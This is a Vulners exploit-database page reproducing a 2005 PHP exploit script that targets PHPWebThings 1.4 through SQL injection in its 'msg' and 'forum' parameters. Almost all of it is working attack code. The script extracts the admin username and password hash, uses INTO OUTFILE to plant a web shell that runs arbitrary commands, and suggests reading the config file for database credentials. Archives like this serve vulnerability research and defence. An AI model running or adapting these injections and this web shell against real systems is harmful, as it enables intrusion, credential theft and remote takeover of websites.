Vulners
Lucene search
PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit
<?php
# ---phpwebth14_xpl.php 10.47 16/11/2005 #
# #
# PHPWebThings 1.4 "msg" and "forum" SQL injection / Administrative #
# credentials disclosure and remote commands execution #
# #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# based on http://secunia.com/advisories/17410/, but here we have a more #
# chritical injection in msg parameter that works with magic_quotes_gpc on) #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-Tzu:"He wins his battles by making no mistakes. Making no mistakes is #
# what establishes the certainty of victory, for it means conquering an enemy #
# that is already defeated."
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> PHPWebThings 1.4 "msg" and "forum" SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
PHPWebThings 1.4 "msg" and "forum" SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value&action=value&fullpath=value&table_prefix=value"><p>
<input type="text" name="host"><span class="Stile5"> * hostname (ex: www.sitena
me.com) </span> </p> <p> <input type="text" name="path"> <span class="Stile5">
* path ( ex: /phpwebthings/ or just / ) </span></p> <p> <input type="text"
name="action"> <span class="Stile5"> * action: HASH to see admin username and
MD5 password hash, CMD to launch commands, PATH to disclose full application
path </span></p><p> <input type="text" name="fullpath"> <span class="Stile5">
full path to www, need this for "INTO OUTFILE" statements (ex.: C:\\\www\\\sit
e\\\, /www/site/, or with backslashes from MySQL data directory: ../../www/site/
)</span></p><p><input type="text" name="command"> <span class="Stile5"> specify
a command, cat wt_config.php to see database username & password</span></p> <p>
<input type="text" name="table_prefix"> <span class="Stile5"> specify a table
prefix other than the default (wt_)</span></p><p><input type="text" name="port">
<span class="Stile5">specify a port other than 80 ( default value ) </span>
</p> <p> <input type="text" name="proxy"> <span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td> </tr> </table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>'') and ($path<>'') and ($action<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="wt_";}
$action=strtoupper($action);
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$fullpath=str_replace("\r\n","",$fullpath);
$table_prefix=str_replace("\r\n","",$table_prefix);
if ($action=="HASH")
{
#STEP 1 - This works with magic_quotes_gpc both on or off (great... ;) ) and exploits the vulnerability in
# [path_to_phpwb]/modules/forum/split.php
#STEP 1A -> Retrieve admin username from database...
$SQL="-999 UNION SELECT 0,0,0,0,0,name,0,0,0,0,0,0,0,0 FROM ".$table_prefix."users WHERE uid=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=explode('name="subname" value="',$html);
$temp2=explode('"',$temp[1]);
$NAME=$temp2[0];
#STEP 1B -> Retrieve MD5 admin password hash from database...
$SQL="-999 UNION SELECT 0,0,0,0,0,password,0,0,0,0,0,0,0,0 FROM ".$table_prefix."users WHERE uid=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=explode('name="subname" value="',$html);
$temp2=explode('"',$temp[1]);
$HASH=$temp2[0];
echo "NAME ->".htmlentities($NAME)."<br>";
echo "HASH ->".htmlentities($HASH)."<br>";
if ($HASH<>'') {echo "Exploit succeeded...";
die;
}
else {echo "Exploit failed... trying next step...<BR>"; }
#STEP 2 -> Try blind injection and save data into output files... this works with magic quotes off
# and exploits the vulnerability in [path_to_phpwb]/forum.php
# we have only an int() as table value so we have to encode username and hash
# as integers in a lot of files
#STEP 2A -> Retrieve admin username fro database...
if ($fullpath<>'')
{
for ($z=1; $z<=20; $z++)
{
$SQL='';
$SQL[$z]="-999 UNION SELECT ORD(SUBSTRING(name,".$z.",1)) INTO OUTFILE '".$fullpath."keepU".$z."'FROM ".$table_prefix."users WHERE uid=1";
$SQL[$z]=urlencode($SQL[$z]);
$packet="GET ".$p."forum.php?act=markread&forum=".$SQL[$z]." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$NAME='';
for ($z=1; $z<=20; $z++)
{
$packet="GET ".$p."keepU".$z." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (!eregi('200 OK',$html)) {break;}
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$temp2=explode(chr(0x0a),$temp[1]);
$NAME.=chr($temp2[0]);
}
#STEP 2B -> MD5 admin password hash from database...
for ($z=1; $z<=32; $z++)
{
$SQL='';
$SQL[$z]="-999 UNION SELECT ORD(SUBSTRING(password,".$z.",1)) INTO OUTFILE '".$fullpath."keep".$z."'FROM ".$table_prefix."users WHERE uid=1";
$SQL[$z]=urlencode($SQL[$z]);
$packet="GET ".$p."forum.php?act=markread&forum=".$SQL[$z]." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$HASH='';
for ($z=1; $z<=32; $z++)
{
$packet="GET ".$p."keep".$z." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (!eregi('200 OK',$html)) {break;}
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$temp2=explode(chr(0x0a),$temp[1]);
$HASH.=chr($temp2[0]);
}
echo "<br> NAME ->".htmlentities($NAME);
echo "<br> HASH ->".htmlentities($HASH);
}
else
{echo "<BR>You need to specify a full application path for STEP 2..."; die;}
}
else
if ($action=="CMD")
{
#STEP X -> Inject a shell, this works with magic_quotes_gpc off
#Note: we could encode shell as an array of chars but
# real problem is that you have to specify output filename literally
# so you are forced to use quotes
# you should specify a full path for shell.php
#ex: /www/site/
# c:\\www\\site\\ (this on windows)
#or with backslashes (from Mysql data directory):
# ../../www/phpwebthings/
#you can disclose the path manually, ex:
#
#http://[target]/[path_to_phpwebthings/sideboxes/counter.php
#http://[target]/[path_to_phpwebthings/sideboxes/lastvisit.php
#if not specified we try to see theese urls...
if (($command<>'') and ($fullpath<>''))
{
$SHELL=":)<?php error_reporting(0);ini_set(\"max_execution_time\",0);system(\$_GET[cmd]);?>";
$SQL="-999 UNION SELECT 0,0,0,0,0,'".$SHELL."',0,0,0,0,0,0,0,0 INTO OUTFILE '".$fullpath."suntzu.php' FROM ".$table_prefix."users/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi(':)',$html)) {echo "Exploit succeded...";}
else {echo "Exploit failed...";}
}
else {echo "Specify a command and full application path for CMD action..."; die;}
}
else
if ($action=="PATH")
{
$packet="GET ".$p."sideboxes/counter.php HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$packet="GET ".$p."sideboxes/lastvisit.php HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
else
{echo "Specify an action..."; }
}
else
{echo 'Specify * required fields, optionally specify a proxy...';}
?>
# milw0rm.com [2005-11-16]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2005 00:00Current
7.1High risk
Vulners AI Score7.1